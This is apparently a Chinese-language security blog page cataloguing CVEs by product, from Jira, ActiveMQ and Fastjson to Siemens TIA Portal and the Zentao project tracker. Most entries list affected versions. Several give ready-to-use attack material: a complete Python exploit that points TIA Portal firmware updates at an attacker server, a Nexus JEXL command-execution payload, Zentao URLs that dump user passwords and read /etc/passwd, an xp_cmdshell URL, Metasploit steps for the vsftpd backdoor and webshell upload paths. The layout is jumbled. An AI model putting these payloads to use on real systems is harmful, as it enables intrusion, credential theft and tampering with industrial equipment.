應用安全-軟件安全-漏洞CVE整理
jiraphp
ssrf CVE-2019-8451
url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/'
Jira未受權服務端模板注入遠程代碼執行漏洞(CVE-2019-11581)
Ueditor
任意文件上傳
Edgehtml
Microsoft Edge 遠程代碼執行漏洞(CVE-2017-8619)
大華攝像頭java
未受權訪問漏洞 受影響: DH-IPC-HDW23A0RN-ZS DH-IPC-HDBW23A0RN-ZS DH-IPC-HDBW13A0SN DH-IPC-HDW13A0SN DH-IPC-HFW13A0SN-W DH-IPC-HDBW13A0SN DH-IPC-HDW13A0SN DH-IPC-HFW13A0SN-W DHI-HCVR51A04HE-S3 DHI-HCVR51A08HE-S3 DHI-HCVR58A32S-S2
Exim郵件服務器node
Exim deliver_message命令注入漏洞(CVE-2019-10149)
DeleGate python
DeleGate DNS消息解壓遠程拒絕服務漏洞 CVE-2005-0036
Fastjsonmysql
RCE Fastjson < V1.2.48
Springgit
Pivotal Spring Framework isWritableProperty SpEL 表達式注入漏洞(CVE-2018-1273) CVE-2018-1270
ImageMagickgithub
RCE CVE-2016-3714
axis2web
弱口令
任意文件讀取
Awstatssql
路徑泄露 http://www.xx.com.cn/cgi-bin/awstats.pl?config=xxx
ccs
注入
ISC BIND
TSIG緩衝區溢出漏洞
拒絕服務漏洞(CVE-2014-8500)
拒絕服務漏洞(cnvd-2018-17514)
ISC BIND安全限制繞過漏洞(CVE-2017-3143)
HFS
RCE
PHP
PHP7 zip組件整型溢出漏洞(CVE-2016-3078) - > 可RCE - 影響範圍是PHP 7.0.6版本之前的全部PHP 7.x 版本
phpmyadmin
弱口令
phpmoadmin
RCE
node.js
node.js v8 debugger RCE
Elasticsearch
RCE
未受權訪問
任意文件讀取
OpenSSLDrown
OpenSSL 1.0.1 through 1.0.1g OpenSSL 1.0.0 through 1.0.0l all versions before OpenSSL 0.9.8y DROWN攻擊漏洞(CVE-2016-0800)
Openssh
libssh認證繞過(cve-2018-10933) ibssh 0.8.x - 0.8.3 libssh 0.7.x - 0.7.5 libssh 0.6.x"
Netgear
Netgear DGN1000B setup.cgi 遠程命令注入漏洞
Bash
破殼漏洞(CVE-2014-6271) 影響: 影響目前主流的Linux和Mac OSX操做系統平臺,包括但不限於Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平臺
Kubernetes
Kubernetes Kubernetes提權(CVE-2018-1002105) Kubernetes v1.0.x-1.9.x Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11) Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5) Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3)
zabbix
latest sql注入漏洞
jsrpc sql注入漏洞
activemq
後臺弱口令
RCE
任意文件上傳
ActiveMQ物理路徑泄漏
Fckeditor
https://www.jianshu.com/p/b0295978da77/fckeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html
http://x.com/goldpen/editor/filemanager/browser/default/ #泄露源碼文件
上傳漏洞
http://www.xx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html
訪問進去直接上傳圖片格式木馬。
http://www.xx.gov.cn/UploadFile/2.php;.gif
KingdEditor
XSS
上傳漏洞
CuteEDitor
上傳漏洞
編輯器Aspx版本 網上公佈的CuteEditor漏洞,配合利用IIS 6.0解析漏洞獲取Webshell WAF防火牆免疫IIS6.0解析漏洞 -> 修改圖片後綴繞過
Apache
Apache ActiveMQ 5.x ~ 5.14.0 ActiveMQ任意文件文件移動漏洞 Apache ActiveMQ 5.13.0的版本以前的存在反序列化漏洞 ActiveMQ反序列化漏洞(CVE-2015-5254) Apache ActiveMQ5.14.0 – 5.15.2 ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
apache mod_jk apache mod_jk訪問控制繞過漏洞(cve-2018-11759)
61616端口(ActiveMQ消息隊列端口)
hudson
代碼泄露
grafana
弱口令
Openssh
1 CVE-2015-5600 2 CVE-2016-6515 3 CVE-2014-1692 4 CVE-2010-4478 5 CVE-2016-10009 6 CVE-2016-1908 7 CVE-2015-8325 8 CVE-2016-10012 9 CVE-2016-10010(提權)
Atlassian
1 CVE-2019-1158
docker
1 CVE-2018-15664
Siemens TIA Portal (STEP7)
RCE : CVE-2019-10915
1 ## 2 # Exploit Title: Siemens TIA Portal remote command execution 3 # Date: 06/11/2019 4 # Exploit Author: Joseph Bingham 5 # CVE : CVE-2019-10915 6 # Advisory: https://www.tenable.com/security/research/tra-2019-33 7 # Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a 8 # Affected Vendors/Device/Firmware: 9 # - Siemens STEP7 / TIA Portal 10 ## 11 12 ## 13 # Example usage 14 # $ python cve_2019_10915_tia_portal_rce.py 15 # Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}' 16 # Received '40' 17 # Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]' 18 ## 19 20 import websocket, ssl, argparse 21 22 parser = argparse.ArgumentParser() 23 parser.add_argument("target_host", help="TIA Portal host") 24 parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int) 25 parser.add_argument("update_server", help="Malicious firmware update server IP") 26 args = parser.parse_args() 27 28 host = args.target_host 29 port = args.target_port 30 updatesrv = args.update_server 31 ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE}) 32 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]' 33 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]' 34 req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]' 35 ws.send(req) 36 37 result = ws.recv() 38 print("Received '%s'" % result) 39 40 result = ws.recv() 41 print("Received '%s'" % result) 42 43 result = ws.recv() 44 print("Received '%s'" % result)
WinRAR
CVE-2018-2025(WinRAR RCE)
1 影響範圍: 2 3 WinRAR < 5.70 Beta 1 4 5 Bandizip < = 6.2.0.0 6 7 好壓(2345壓縮) < = 5.9.8.10907 8 9 360壓縮 < = 4.0.0.1170
ghostscript
1 影響的版本 <= 9.23(全版本、全平臺)
CVE-2017-8291
1 Ghostscript Ghostscript < 2017-04-26
Flash
CVE-2018-4878
1 項目地址:https://github.com/Sch01ar/CVE-2018-4878.git 2 3 影響版本爲:Adobe Flash Player <= 28.0.0.137
Office
CVE-2017-11882(RCE)
1 漏洞影響版本: 2 Office 365 3 Microsoft Office 2000 4 Microsoft Office 2003 5 Microsoft Office 2007 Service Pack 3 6 Microsoft Office 2010 Service Pack 2 7 Microsoft Office 2013 Service Pack 1 8 Microsoft Office 2016
vsftpd
1 vsftpd 2.3.4 - 笑臉漏洞 2 msfconsole 3 search vsftpd 4 use exploit/unix/ftp/vsftpd_234_backdoor 5 set rhost IP 6 run
memcache
經常使用端口 11211 未受權訪問
memcache memcache drdos漏洞( B6-2018-030102) 1.4.31 memcache Memcached Append/prepend 遠程代碼執行漏洞(CVE-2016-8704) 1.4.31 memcache Memcache Update 遠程代碼執行漏洞(CVE-2016-8705) 1.4.31 memcache Memcache SASL身份驗證遠程代碼執行漏洞(CVE-2016-8706)
jenkins
經常使用端口 8080 未受權訪問 反序列化 cve-2017-1000353 CVE-2018-1999002
GeoServer
1.弱口令
Javascript is required to actually use the GeoServer admin console. - 網站沒有添加到可信任站點
2.XXE(版本小於2.7.1.1)
ccproxy
ccproxy6.0遠程溢出
solr
未受權訪問 CVE-2017-12629 XXE & RCE CVE-2019-0193 RCE
Secure File Transfe
version <= 0.18 CVE-2015-2856 CVE-2015-2857 version <= 0.20 CVE-2016-2350 CVE-2016-2351 CVE-2016-2352 CVE-2016-2353
Kibana
Elasticsearch Kibana本地文件包含漏洞(CVE-2018-17246)
SCOoffice
SCOoffice Server "STARTTLS"純文本注入漏洞
LIVE555
LIVE555 RTSP服務器緩衝區溢出漏洞(CVE-2018-4013) -》 RCE
Ruby on Rails
Ruby on Rails 路徑穿越與任意文件讀取(CVE-2019-5418)
Systemd
Systemd dns_packet_new函數堆緩衝區遠程溢出漏洞 CVE-2017-9445 影響範圍: Systemd 版本223,該版本早於 2015 年 6 月,其後還包括 2017 年 3 月 發佈的Systemd 版本 233 該漏洞影響 Ubuntu 17.04 版和 16.10 版 ; Debian 版本 Stretch(又名Debian 9),Buster(又名10)和 Sid(又名Unstable); 以及使用 Systemd 的各類其餘 Linux 發行版
D-Link
D-Link DSL-2750B任意命令執行漏洞
金山安全套裝
ksapi.sys對關鍵位置未保護,致使繞過限制
webTextbox編輯器
cookie欺騙
WebEditor
任意文件上傳 http://nel.xx.com//main/model/newsoperation/webEditor/eWebEditor.jsp
GPON路由器
驗證繞過漏洞(CVE-2018-10561) 命令注入漏洞(CVE-2018-10562)
Advantech Studio
Advantech Studio NTWebServer任意文件訪問漏洞 受影響: Advantech Advantech Studio 7.0
Nexus
CVE-2019-7238
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositioryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":10}
通達OA
Office Anywhere 網絡智能辦公系統
路徑泄漏問題,能夠不須要權限登陸到phpmyadmin 且權限爲root
/mysql/main.php
源天OA
RCE http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27
禪道
禪道 11.6.2
越權
http://127.0.0.1/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin
注入 http://127.0.0.1/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user 任意文件讀取 http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd
RCE
FasterXML
Jackson-databind CVE-2019-12384(RCE) 受影響版本 Jackson-databind 2.X < 2.9.9.1 不受影響版本 Jackson-databind 2.9.9.1 Jackson-databind 2.10
相關文章
- 1. 應用安全-CMF/CMS漏洞整理
- 2. 應用安全-Web安全-漏洞修復方案整理
- 3. 應用安全 - 中間件漏洞 - Nostromo
- 4. 漏洞安全
- 5. webview 安全漏洞
- 6. SaltStack安全漏洞(CVE-2020-11651/CVE-2020-11652)通告
- 7. WEB應用安全之常見安全漏洞
- 8. 說一說Windows嚴重安全漏洞CVE-2020-0601的原理
- 9. 記一次安全漏洞處理過程CVE-2018-3252
- 10. Android安全之WebViewUXSS漏洞
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • C# 不安全代碼 - C#教程
- • Composer 安裝與使用
- • IntelliJ IDEA安裝代碼格式化插件
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
